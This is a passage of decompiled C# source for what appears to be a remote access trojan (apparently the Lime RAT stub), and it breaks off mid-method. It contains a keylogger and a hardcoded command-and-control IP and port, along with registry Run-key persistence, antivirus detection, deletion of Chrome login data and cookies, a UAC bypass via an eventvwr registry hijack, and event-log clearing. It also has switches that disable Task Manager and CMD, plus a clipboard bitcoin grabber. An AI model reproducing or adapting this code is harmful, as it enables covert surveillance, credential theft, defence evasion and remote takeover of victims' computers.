/*Error near IL_008d: Could not find block for branch target IL_0055*/;
}
if (num3 != 0)
{
ProjectData.ClearProjectError();
}
return result;
IL_008f:
throw ProjectData.CreateProjectError(-2146828237);
}
public static bool IsBitTorrent()
{
if (File.Exists(Torrent.BitLocalPath))
{
return true;
}
return false;
}
public static void SeedIt(string ClientPath, string LocalPath, string TorrentPath)
{
int num = default(int);
int num3 = default(int);
try
{
goto IL_0002;
IL_0002:
ProjectData.ClearProjectError();
num = -2;
goto IL_000b;
IL_000b:
int num2 = 2;
ProcessStartInfo processStartInfo = new ProcessStartInfo();
goto IL_0013;
IL_0013:
num2 = 3;
processStartInfo.FileName = ClientPath;
goto IL_001d;
IL_001d:
num2 = 4;
processStartInfo.Arguments = "/" + LocalPath + " \"" + TorrentPath + "\"";
goto IL_0051;
IL_0051:
num2 = 5;
processStartInfo.CreateNoWindow = true;
goto IL_005b;
IL_005b:
num2 = 6;
processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
goto IL_0065;
IL_0065:
num2 = 7;
processStartInfo.ErrorDialog = false;
goto IL_006f;
IL_006f:
num2 = 8;
Process.GetProcessesByName("BitTorrent")[0].Kill();
goto IL_0083;
IL_0083:
num2 = 9;
Process.GetProcessesByName("uTorrent")[0].Kill();
goto IL_0098;
IL_0098:
num2 = 10;
Process process = Process.Start(processStartInfo);
goto IL_00a3;
IL_00a3:
num2 = 11;
if (ClientPath.Contains("uTorrent"))
{
goto IL_00b7;
}
goto IL_00c8;
IL_00b7:
num2 = 12;
Torrent.HideIt("uTorrent");
goto end_IL_0001;
IL_00c8:
num2 = 14;
if (ClientPath.Contains("BitTorrent"))
{
goto IL_00dc;
}
goto end_IL_0001;
IL_00dc:
num2 = 15;
Torrent.HideIt("BitTorrent");
goto end_IL_0001;
IL_00f0:
int num4 = num3 + 1;
num3 = 0;
switch (num4)
{
case 13:
goto end_IL_0001;
case 16:
goto end_IL_0001;
case 17:
goto end_IL_0001;
case 1:
goto IL_0002;
case 2:
goto IL_000b;
case 3:
goto IL_0013;
case 4:
goto IL_001d;
case 5:
goto IL_0051;
case 6:
goto IL_005b;
case 7:
goto IL_0065;
case 8:
goto IL_006f;
case 9:
goto IL_0083;
case 10:
goto IL_0098;
case 11:
goto IL_00a3;
case 12:
goto IL_00b7;
case 14:
goto IL_00c8;
case 15:
goto IL_00dc;
default:
goto IL_017e;
}
IL_0144:
num3 = num2;
if (num > -2)
{
goto IL_014e;
}
goto IL_014b;
IL_014b:
int num5 = 1;
goto IL_014f;
IL_014e:
num5 = num;
goto IL_014f;
IL_014f:
switch (num5)
{
case 1:
goto IL_00f0;
default:
goto IL_017e;
}
end_IL_0001:;
}
catch (object obj) when (obj is Exception & num != 0 & num3 == 0)
{
ProjectData.SetProjectError((Exception)obj);
/*Error near IL_017c: Could not find block for branch target IL_0144*/;
}
if (num3 != 0)
{
ProjectData.ClearProjectError();
}
return;
IL_017e:
throw ProjectData.CreateProjectError(-2146828237);
}
public static void HideIt(string TorrentClient)
{
int num = default(int);
int num3 = default(int);
try
{
goto IL_0002;
IL_0002:
ProjectData.ClearProjectError();
num = -2;
goto IL_000b;
IL_000b:
int num2 = 2;
Thread.Sleep(1000);
goto IL_0018;
IL_0018:
num2 = 3;
Process[] processesByName = Process.GetProcessesByName(TorrentClient);
goto IL_0021;
IL_0021:
num2 = 4;
Torrent.ShowWindow(processesByName[0].MainWindowHandle.ToInt32(), 0);
goto end_IL_0001;
IL_003d:
int num4 = num3 + 1;
num3 = 0;
switch (num4)
{
case 5:
goto end_IL_0001;
case 1:
goto IL_0002;
case 2:
goto IL_000b;
case 3:
goto IL_0018;
case 4:
goto IL_0021;
default:
goto IL_009b;
}
IL_0061:
num3 = num2;
if (num > -2)
{
goto IL_006b;
}
goto IL_0068;
IL_0068:
int num5 = 1;
goto IL_006c;
IL_006b:
num5 = num;
goto IL_006c;
IL_006c:
switch (num5)
{
case 1:
goto IL_003d;
default:
goto IL_009b;
}
end_IL_0001:;
}
catch (object obj) when (obj is Exception & num != 0 & num3 == 0)
{
ProjectData.SetProjectError((Exception)obj);
/*Error near IL_0099: Could not find block for branch target IL_0061*/;
}
if (num3 != 0)
{
ProjectData.ClearProjectError();
}
return;
IL_009b:
throw ProjectData.CreateProjectError(-2146828237);
}
}
// j.A
using j;
using System;
public class A
{
[STAThread]
public static void main()
{
OK.ko();
}
}
// j.kl
using j;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;
public class kl
{
private string LastAS;
private int LastAV;
private Keys lastKey;
public string Logs;
public string vn;
public kl()
{
this.lastKey = Keys.None;
this.Logs = "";
this.vn = "[kl]";
}
private string AV()
{
try
{
IntPtr foregroundWindow = OK.GetForegroundWindow();
int processId = default(int);
kl.GetWindowThreadProcessId(foregroundWindow, ref processId);
Process processById = Process.GetProcessById(processId);
if (!((foregroundWindow.ToInt32() == this.LastAV & Operators.CompareString(this.LastAS, processById.MainWindowTitle, false) == 0) | processById.MainWindowTitle.Length == 0))
{
this.LastAV = foregroundWindow.ToInt32();
this.LastAS = processById.MainWindowTitle;
return "\r\n\u0001" + DateAndTime.Now.ToString("yy/MM/dd ") + processById.ProcessName + " " + this.LastAS + "\u0001\r\n";
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
return "";
}
private string Fix(Keys k)
{
bool flag = OK.F.Keyboard.ShiftKeyDown;
if (OK.F.Keyboard.CapsLock)
{
flag = (!flag && true);
}
string result;
try
{
Keys keys = k;
if (keys <= Keys.End)
{
if (keys <= Keys.Return)
{
switch (keys)
{
case Keys.Back:
break;
case Keys.Return:
goto IL_0115;
case Keys.Tab:
return "[TAP]\r\n";
default:
goto IL_014f;
}
goto IL_00da;
}
if ((uint)(keys - 16) > 1u)
{
switch (keys)
{
case Keys.End:
break;
case Keys.Space:
return " ";
default:
goto IL_014f;
}
}
}
else
{
if (keys <= Keys.RControlKey)
{
if (keys != Keys.Delete)
{
if ((uint)(keys - 112) > 11u && (uint)(keys - 160) > 3u)
{
goto IL_014f;
}
goto IL_00fd;
}
goto IL_00da;
}
if (keys != Keys.Shift && keys != Keys.Control && keys != Keys.Alt)
{
goto IL_014f;
}
}
goto IL_00fd;
IL_014f:
checked
{
if (flag)
{
return kl.VKCodeToUnicode((uint)k).ToUpper();
}
result = kl.VKCodeToUnicode((uint)k);
goto end_IL_0036;
}
IL_00da:
return "[" + k.ToString() + "]";
IL_0115:
if (this.Logs.EndsWith("[ENTER]\r\n"))
{
return "";
}
return "[ENTER]\r\n";
IL_00fd:
return "";
end_IL_0036:;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
char c;
if (flag)
{
c = Strings.ChrW((int)k);
result = c.ToString().ToUpper();
ProjectData.ClearProjectError();
string result2 = result;
ProjectData.ClearProjectError();
return result2;
}
c = Strings.ChrW((int)k);
result = c.ToString().ToLower();
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
return result;
}
[DllImport("user32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
private static extern short GetAsyncKeyState(int a);
[DllImport("user32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
private static extern int GetKeyboardLayout(int a);
[DllImport("user32.dll")]
private static extern bool GetKeyboardState(byte[] a);
[DllImport("user32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
private static extern int GetWindowThreadProcessId(IntPtr a, ref int b);
[DllImport("user32.dll")]
private static extern uint MapVirtualKey(uint a, uint b);
[DllImport("user32.dll")]
private static extern int ToUnicodeEx(uint a, uint b, byte[] c, [Out] [MarshalAs(UnmanagedType.LPWStr)] StringBuilder d, int e, uint f, IntPtr g);
private static string VKCodeToUnicode(uint a)
{
try
{
StringBuilder stringBuilder = new StringBuilder();
byte[] array = new byte[255];
if (!kl.GetKeyboardState(array))
{
return "";
}
uint b = kl.MapVirtualKey(a, 0u);
int num = 0;
IntPtr g = (IntPtr)kl.GetKeyboardLayout(kl.GetWindowThreadProcessId(OK.GetForegroundWindow(), ref num));
kl.ToUnicodeEx(a, b, array, stringBuilder, 5, 0u, g);
return stringBuilder.ToString();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
return ((Enum)checked((int)a)).ToString();
}
public void WRK()
{
this.Logs = Conversions.ToString(RuntimeHelpers.GetObjectValue(OK.GTV(this.vn, "")));
checked
{
try
{
int num = 0;
while (true)
{
num++;
int num2 = 0;
do
{
if (kl.GetAsyncKeyState(num2) == -32767 & !OK.F.Keyboard.CtrlKeyDown)
{
Keys k = unchecked((Keys)num2);
string text = this.Fix(k);
if (text.Length > 0)
{
this.Logs += this.AV();
this.Logs += text;
}
this.lastKey = k;
}
num2++;
}
while (num2 <= 255);
if (num == 1000)
{
num = 0;
int num3 = Conversions.ToInteger("20") * 1024;
if (this.Logs.Length > num3)
{
this.Logs = this.Logs.Remove(0, this.Logs.Length - num3);
}
OK.STV(this.vn, this.Logs, RegistryValueKind.String);
}
Thread.Sleep(1);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
}
}
// j.OK
using j;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.VisualBasic.Devices;
using Microsoft.Win32;
using My;
using System;
using System.Diagnostics;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.IO.Compression;
using System.Net;
using System.Net.Sockets;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Security.Principal;
using System.Text;
using System.Threading;
using System.Windows.Forms;
[StandardModule]
internal sealed class OK
{
[Serializable]
[CompilerGenerated]
internal sealed class _Closure$__
{
public static readonly _Closure$__ $I;
public static ParameterizedThreadStart $IR26-1;
static _Closure$__()
{
_Closure$__.$I = new _Closure$__();
}
[DebuggerHidden]
internal void _Lambda$__R26-1(object a0)
{
Clipboard.SetText(Conversions.ToString(a0));
}
}
public static string BTC_ADD = "";
public static bool BTC_EN = Conversions.ToBoolean("False");
public static string SLP = "0";
public static string TMOT = "10";
private static byte[] b = new byte[5121];
public static bool BD = Conversions.ToBoolean("False");
public static TcpClient C = null;
public static bool Cn = false;
public static string DR = "AppData";
public static string EXE = "Hardware.exe";
public static Computer F = new Computer();
public static FileStream FS;
public static string H = "195.123.217.189";
public static bool Idr = Conversions.ToBoolean("True");
public static bool Anti_CH = Conversions.ToBoolean("False");
public static bool IsF = Conversions.ToBoolean("True");
public static bool USB_SP = Conversions.ToBoolean("False");
public static bool Isu = Conversions.ToBoolean("True");
public static kl kq = null;
private static string lastcap = "";
public static FileInfo LO = new FileInfo(Assembly.GetEntryAssembly().Location);
private static MemoryStream MeM = new MemoryStream();
public static object MT = null;
public static string P = "10050";
public static object PLG = null;
public static string RG = "Hardware.exe";
public static string sf = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
public static string VN = "Qk5FVC0=";
public static string VR = "0.7.3";
public static string Y = "firefox";
public static bool BOT_KILL = Conversions.ToBoolean("False");
public static bool HIDE_ME = Conversions.ToBoolean("False");
public static bool Persis = Conversions.ToBoolean("True");
[CompilerGenerated]
[DebuggerStepThrough]
private static void _Lambda__1(object a0)
{
OK.Ind((byte[])a0);
}
[DebuggerStepThrough]
[CompilerGenerated]
private static void _Lambda__2(object a0, SessionEndingEventArgs a1)
{
OK.ED();
}
public static string ACT()
{
string result;
try
{
IntPtr foregroundWindow = OK.GetForegroundWindow();
if (foregroundWindow == IntPtr.Zero)
{
return "";
}
string text = Strings.Space(checked(OK.GetWindowTextLength((long)foregroundWindow) + 1));
OK.GetWindowText(foregroundWindow, ref text, text.Length);
result = OK.ENB(ref text);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
result = "";
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
return result;
}
public static string BS(ref byte[] B)
{
return Encoding.UTF8.GetString(B);
}
public static bool Cam()
{
checked
{
try
{
int num = 0;
do
{
string text = null;
short wDriver = (short)num;
string text2 = Strings.Space(100);
if (OK.capGetDriverDescriptionA(wDriver, ref text2, 100, ref text, 100))
{
return true;
}
num++;
}
while (num <= 4);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
return false;
}
}
[DllImport("avicap32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
public static extern bool capGetDriverDescriptionA(short wDriver, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszName, int cbName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVer, int cbVer);
private static bool CompDir(FileInfo F1, FileInfo F2)
{
if (Operators.CompareString(F1.Name.ToLower(), F2.Name.ToLower(), false) == 0)
{
DirectoryInfo directoryInfo = F1.Directory;
DirectoryInfo directoryInfo2 = F2.Directory;
do
{
if (Operators.CompareString(directoryInfo.Name.ToLower(), directoryInfo2.Name.ToLower(), false) != 0)
{
return false;
}
directoryInfo = directoryInfo.Parent;
directoryInfo2 = directoryInfo2.Parent;
if (directoryInfo == null & directoryInfo2 == null)
{
return true;
}
if (directoryInfo == null)
{
return false;
}
}
while (directoryInfo2 != null);
}
return false;
}
public static bool connect()
{
OK.Cn = false;
Thread.Sleep(2000);
FileInfo lO = OK.LO;
lock (lO)
{
try
{
if (OK.C != null)
{
try
{
OK.C.Close();
OK.C = null;
Thread.Sleep(checked((int)Math.Round(Math.Round(Math.Round(unchecked(Conversions.ToDouble(OK.TMOT) * 1000.0))))));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
try
{
OK.MeM.Dispose();
}
catch (Exception ex4)
{
ProjectData.SetProjectError(ex4);
Exception ex5 = ex4;
ProjectData.SetProjectError(ex5);
Exception ex6 = ex5;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
catch (Exception ex7)
{
ProjectData.SetProjectError(ex7);
Exception ex8 = ex7;
ProjectData.SetProjectError(ex8);
Exception ex9 = ex8;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
try
{
OK.MeM = new MemoryStream();
OK.C = new TcpClient();
OK.C.ReceiveBufferSize = 204800;
OK.C.SendBufferSize = 204800;
OK.C.Client.SendTimeout = 10000;
OK.C.Client.ReceiveTimeout = 10000;
OK.C.Connect(OK.H, Conversions.ToInteger(OK.P));
OK.Cn = true;
OK.Send(OK.inf());
try
{
string text = default(string);
if (Operators.ConditionalCompareObjectEqual(RuntimeHelpers.GetObjectValue(OK.GTV("vn", "")), "", false))
{
text = text + OK.DEB(ref OK.VN) + "\r\n";
}
else
{
string str = text;
string text2 = Conversions.ToString(RuntimeHelpers.GetObjectValue(OK.GTV("vn", "")));
text = str + OK.DEB(ref text2) + "\r\n";
}
text = text + OK.H + ":" + OK.P + "\r\n" + OK.DR + "\r\n" + OK.EXE + "\r\n" + Conversions.ToString(OK.Idr) + "\r\n" + Conversions.ToString(OK.IsF) + "\r\n" + Conversions.ToString(OK.Isu) + "\r\n" + Conversions.ToString(OK.BD);
OK.Send("inf" + OK.Y + OK.ENB(ref text));
}
catch (Exception ex10)
{
ProjectData.SetProjectError(ex10);
Exception ex11 = ex10;
ProjectData.SetProjectError(ex11);
Exception ex12 = ex11;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
catch (Exception ex13)
{
ProjectData.SetProjectError(ex13);
Exception ex14 = ex13;
ProjectData.SetProjectError(ex14);
Exception ex15 = ex14;
OK.Cn = false;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
return OK.Cn;
}
public static string DEB(ref string s)
{
byte[] array = Convert.FromBase64String(s);
return OK.BS(ref array);
}
public static void DLV(string n)
{
try
{
OK.F.Registry.CurrentUser.OpenSubKey("Software\\" + OK.RG, true).DeleteValue(n);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
public static void ED()
{
OK.pr(0);
}
public static string ENB(ref string s)
{
return Convert.ToBase64String(OK.SB(ref s));
}
[DllImport("user32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
public static extern IntPtr GetForegroundWindow();
[DllImport("kernel32", CharSet = CharSet.Ansi, EntryPoint = "GetVolumeInformationA", ExactSpelling = true, SetLastError = true)]
private static extern int GetVolumeInformation([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpRootPathName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpVolumeNameBuffer, int nVolumeNameSize, ref int lpVolumeSerialNumber, ref int lpMaximumComponentLength, ref int lpFileSystemFlags, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpFileSystemNameBuffer, int nFileSystemNameSize);
[DllImport("user32.dll", CharSet = CharSet.Ansi, EntryPoint = "GetWindowTextA", ExactSpelling = true, SetLastError = true)]
public static extern int GetWindowText(IntPtr hWnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string WinTitle, int MaxLength);
public static string GetAntiVirus()
{
Process[] processes = Process.GetProcesses();
int num = 0;
checked
{
string text;
do
{
string processName = processes[num].ProcessName;
text = ((Operators.CompareString(processName, "ekrn", false) != 0) ? ((Operators.CompareString(processName, "avgcc", false) != 0) ? ((Operators.CompareString(processName, "avgnt", false) != 0) ? ((Operators.CompareString(processName, "QHWatchdog", false) != 0) ? ((Operators.CompareString(processName, "ahnsd", false) != 0) ? ((Operators.CompareString(processName, "bdss", false) != 0) ? ((Operators.CompareString(processName, "bdv", false) != 0) ? ((Operators.CompareString(processName, "clamav", false) != 0) ? ((Operators.CompareString(processName, "fpavserver", false) != 0) ? ((Operators.CompareString(processName, "fssm32", false) != 0) ? ((Operators.CompareString(processName, "avkcl", false) != 0) ? ((Operators.CompareString(processName, "engface", false) != 0) ? ((Operators.CompareString(processName, "avp", false) != 0) ? ((Operators.CompareString(processName, "updaterui", false) != 0) ? ((Operators.CompareString(processName, "msmpeng", false) != 0) ? ((Operators.CompareString(processName, "zanda", false) != 0) ? ((Operators.CompareString(processName, "npupdate", false) != 0) ? ((Operators.CompareString(processName, "inicio", false) != 0) ? ((Operators.CompareString(processName, "sagui", false) != 0) ? ((Operators.CompareString(processName, "savservice", false) != 0) ? ((Operators.CompareString(processName, "saswinlo", false) != 0) ? ((Operators.CompareString(processName, "spbbcsvc", false) != 0) ? ((Operators.CompareString(processName, "thd32", false) != 0) ? ((Operators.CompareString(processName, "ufseagnt", false) != 0) ? ((Operators.CompareString(processName, "dllhook", false) != 0) ? ((Operators.CompareString(processName, "sbamtray", false) != 0) ? ((Operators.CompareString(processName, "vrmonsvc", false) != 0) ? ((Operators.CompareString(processName, "dllhook", false) != 0) ? ((Operators.CompareString(processName, "vbcalrt", false) != 0) ? ((Operators.CompareString(processName, "aswUpdSv", false) != 0) ? "Not Found" : "Avast") : "VirusBuster") : "VBA32") : "ViRobot") : "VIPRE") : "VBA32") : "TrendMicro") : "TheHacker") : "Symantec") : "SUPERAntiSpyware") : "Sophos") : "Prevx") : "Panda") : "nProtect") : "Norman") : "microsoft security essentials") : "McAfee") : "Kaspersky") : "Jiangmin") : "GData") : "F-Secure") : "F-Prot") : "ClamAV") : "ByteHero") : "BitDefender") : "AhnLab-V3") : "Total Security 360") : "Avira") : "AVG") : "NOD32");
int id = processes[num].Id;
num++;
}
while (!(Operators.CompareString(text, "Not Found", false) != 0 | num > processes.Length - 1));
if (num > processes.Length - 1)
{
text = "Not Found";
}
return text;
}
}
[DllImport("user32.dll", CharSet = CharSet.Ansi, EntryPoint = "GetWindowTextLengthA", ExactSpelling = true, SetLastError = true)]
public static extern int GetWindowTextLength(long hwnd);
public static object GTV(string n, object ret)
{
object objectValue;
try
{
objectValue = RuntimeHelpers.GetObjectValue(OK.F.Registry.CurrentUser.OpenSubKey("Software\\" + OK.RG).GetValue(n, RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(ret))));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
objectValue = RuntimeHelpers.GetObjectValue(ret);
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
return objectValue;
}
public static string HWD()
{
string result;
try
{
string text = null;
int num = 0;
int num2 = 0;
string text2 = null;
string text3 = Interaction.Environ("SystemDrive") + "\\";
int number = default(int);
OK.GetVolumeInformation(ref text3, ref text, 0, ref number, ref num, ref num2, ref text2, 0);
result = Conversion.Hex(number);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
result = "ERR";
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
return result;
}
[DllImport("user32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
public static extern long SwapMouseButton(long bSwap);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern void SendMessage(int hWnd, uint msg, uint wParam, int lparam);
[DllImport("user32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
private static extern int SetWindowPos(int hwnd, int hWndInsertAfter, int x, int y, int cx, int cy, int wFlags);
[DllImport("user32", CharSet = CharSet.Ansi, EntryPoint = "FindWindowA", ExactSpelling = true, SetLastError = true)]
private static extern int FindWindow([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpClassName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpWindowName);
[DllImport("user32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
private static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public static void Ind(byte[] b)
{
string[] array = Strings.Split(OK.BS(ref b), OK.Y, -1, CompareMethod.Binary);
try
{
string text = array[0];
switch (<PrivateImplementationDetails>.ComputeStringHash(text))
{
case 1346747564u:
if (Operators.CompareString(text, "seed", false) == 0)
{
Torrent.SeedTorrent(array[1]);
}
break;
case 64384596u:
if (Operators.CompareString(text, "delchrm", false) == 0)
{
try
{
Process[] processesByName = Process.GetProcessesByName("chrome");
Process[] array2 = processesByName;
foreach (Process process in array2)
{
process.Kill();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.ClearProjectError();
}
Thread.Sleep(200);
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Login Data");
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Cookies");
}
break;
case 1938327121u:
if (Operators.CompareString(text, "GiveMeAdmin", false) == 0)
{
OK.pr(0);
using (RegistryKey registryKey = Registry.CurrentUser.CreateSubKey("Software\\Classes\\mscfile\\shell\\open\\command"))
{
registryKey.SetValue("", Application.ExecutablePath, RegistryValueKind.String);
}
Process.Start("eventvwr.exe");
ProjectData.EndApp();
}
break;
case 3883927432u:
if (Operators.CompareString(text, "BitcoinON", false) == 0)
{
if (!OK.BTC_EN)
{
OK.Send("MSG" + OK.Y + "BitcoinGrabber was not checked when stub created!");
return;
}
CallEveryXSeconds.Start();
}
break;
case 2356653186u:
if (Operators.CompareString(text, "BitcoinOFF", false) == 0)
{
if (!OK.BTC_EN)
{
OK.Send("MSG" + OK.Y + "BitcoinGrabber was not checked when stub created!");
return;
}
CallEveryXSeconds.stopme();
}
break;
case 2113050452u:
if (Operators.CompareString(text, "EventLogs", false) == 0)
{
object current4 = WindowsIdentity.GetCurrent();
object instance4 = new WindowsPrincipal((WindowsIdentity)current4);
if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance4, null, "IsInRole", new object[1]
{
WindowsBuiltInRole.Administrator
}, null, null, null)))
{
OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator");
}
else
{
EventLog eventLog = new EventLog();
EventLog[] eventLogs = EventLog.GetEventLogs();
foreach (EventLog eventLog in eventLogs)
{
eventLog.Clear();
eventLog.Close();
}
}
}
break;
case 3968740937u:
if (Operators.CompareString(text, "ShowBar", false) == 0)
{
string text4 = "Shell_traywnd";
string text5 = "";
int hwnd2 = OK.FindWindow(ref text4, ref text5);
OK.SetWindowPos(hwnd2, 0, 0, 0, 0, 0, 64);
}
break;
case 2054338866u:
if (Operators.CompareString(text, "HideBar", false) == 0)
{
string text2 = "Shell_traywnd";
string text3 = "";
int hwnd = OK.FindWindow(ref text2, ref text3);
OK.SetWindowPos(hwnd, 0, 0, 0, 0, 0, 128);
}
break;
case 2317804999u:
if (Operators.CompareString(text, "taskmgrOFF", false) == 0)
{
object current = WindowsIdentity.GetCurrent();
object instance = new WindowsPrincipal((WindowsIdentity)current);
if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance, null, "IsInRole", new object[1]
{
WindowsBuiltInRole.Administrator
}, null, null, null)))
{
OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator");
}
else
{
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "1", RegistryValueKind.DWord);
}
}
break;
case 718925475u:
if (Operators.CompareString(text, "taskmgrON", false) == 0)
{
object current3 = WindowsIdentity.GetCurrent();
object instance3 = new WindowsPrincipal((WindowsIdentity)current3);
if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance3, null, "IsInRole", new object[1]
{
WindowsBuiltInRole.Administrator
}, null, null, null)))
{
OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator");
}
else
{
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "0", RegistryValueKind.DWord);
}
}
break;
case 3213366942u:
if (Operators.CompareString(text, "EnableCMD", false) == 0)
{
object current2 = WindowsIdentity.GetCurrent();
object instance2 = new WindowsPrincipal((WindowsIdentity)current2);
if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance2, null, "IsInRole", new object[1]
{
WindowsBuiltInRole.Administrator
}, null, null, null)))
{
OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator");
}
else
{
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", "0", RegistryValueKind.DWord);
}
}
break;
case 1700680649u:
if (Operators.CompareString(text, "DisableCMD", false) == 0)
{
object current6 = WindowsIdentity.GetCurrent();
object instance6 = new WindowsPrincipal((WindowsIdentity)current6);
if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance6, null, "IsInRole", new object[1]
{
WindowsBuiltInRole.Administrator
}, null, null, null)))
{
OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator");
}
else
{
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", "1", RegistryValueKind.DWord);
}
}
break;
case 3108627940u:
if (Operators.CompareString(text, "MonitorON", false) == 0)
{
OK.SendMessage(-1, 274u, 61808u, -1);
}
break;
case 557886142u:
if (Operators.CompareString(text, "MonitorOFF", false) == 0)
{
OK.SendMessage(-1, 274u, 61808u, 2);
}
break;
case 860096209u:
if (Operators.CompareString(text, "NormalMouse", false) == 0)
{
OK.SwapMouseButton(0L);
}
break;
case 2922144132u:
if (Operators.CompareString(text, "ReverseMouse", false) == 0)
{
OK.SwapMouseButton(256L);
}
break;
case 2576659495u:
if (Operators.CompareString(text, "ClearClp", false) == 0)
{
Thread thread2 = new Thread(Clipboard.Clear);
thread2.SetApartmentState(ApartmentState.STA);
thread2.Start();
}
break;
case 3553460540u:
if (Operators.CompareString(text, "SetClp", false) == 0)
{
Thread thread = new Thread((_Closure$__.$IR26-1 == null) ? (_Closure$__.$IR26-1 = delegate(object a0)
{
Clipboard.SetText(Conversions.ToString(a0));
}) : _Closure$__.$IR26-1);
thread.SetApartmentState(ApartmentState.STA);
thread.Start(array[1]);
}
break;
case 601276870u:
if (Operators.CompareString(text, "OpenWebpageHidden", false) == 0)
{
ProcessStartInfo processStartInfo = new ProcessStartInfo();
processStartInfo.FileName = "iexplore.exe";
processStartInfo.Arguments = array[1];
processStartInfo.CreateNoWindow = true;
processStartInfo.ErrorDialog = false;
processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
Process.Start(processStartInfo);
}
break;
case 3642407086u:
if (Operators.CompareString(text, "OpenWebpage", false) == 0)
{
Process.Start(array[1]);
}
break;
case 4269631087u:
if (Operators.CompareString(text, "BlockWebpage", false) == 0)
{
object current5 = WindowsIdentity.GetCurrent();
object instance5 = new WindowsPrincipal((WindowsIdentity)current5);
